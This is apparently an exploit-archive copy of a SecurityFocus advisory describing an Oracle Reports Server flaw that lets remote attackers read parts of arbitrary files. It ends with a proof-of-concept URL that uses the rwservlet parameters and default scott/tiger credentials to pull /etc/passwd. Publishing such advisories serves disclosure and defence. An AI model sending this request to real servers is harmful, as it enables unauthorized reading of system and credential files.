10 lines
No EOL
518 B
Text
10 lines
No EOL
518 B
Text
source: https://www.securityfocus.com/bid/14312/info
|
|
|
|
Oracle Reports Server may allow remote attackers to disclose parts of arbitrary files.
|
|
|
|
Reportedly, the server fails to restrict users from accessing parts of arbitrary files when handling specially crafted HTTP GET requests.
|
|
|
|
All versions of Oracle Reports Server are reported to be vulnerable to this issue.
|
|
|
|
http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
|
|
ott/tiger@iasdb+destype=file+MODE=CHARACTER+desformat=/etc/passwd |